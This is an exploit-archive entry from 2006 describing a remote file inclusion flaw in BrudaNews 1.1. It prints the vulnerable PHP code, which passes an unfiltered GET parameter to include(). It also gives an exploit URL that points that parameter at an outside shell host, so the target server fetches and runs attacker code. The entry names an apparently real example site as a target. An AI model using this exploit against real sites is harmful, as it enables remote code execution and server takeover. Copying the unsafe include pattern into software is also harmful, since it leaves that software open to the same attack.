id: 888
date: 09/25/2006
title: BrudaNews <= 1.1 (admin/index.php) Remote File Include Vulnerability
author: SHiKaA
cves: 

====================================================================
BrudaNews <= 1.1 (admin/index.php) Remote File Include Vulnerability
====================================================================


#==============================================================================================
#BrudaNews <= v1.1 (o) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://www.brudaswen.de      
#                                                                      
#Version : v1.1 & 1.0                                            
#                                                        
#================================================================================================
#
#Example : http://www.nebelweb.de/php/news
#
#================================================================================================
#Bug in : admin/index.php
#
#Vlu Code :
#--------------------------------
 <?
 if($_GET[o] != "")
 {
 include($_GET[o].".php");
  }
 BrudaNews();
   ?>
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/index.php?o=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Special Thx To :simoo & Timq & XoRoN & Saudi HAckerz
=================================================================================================



#  0day.today [2023-03-22]  #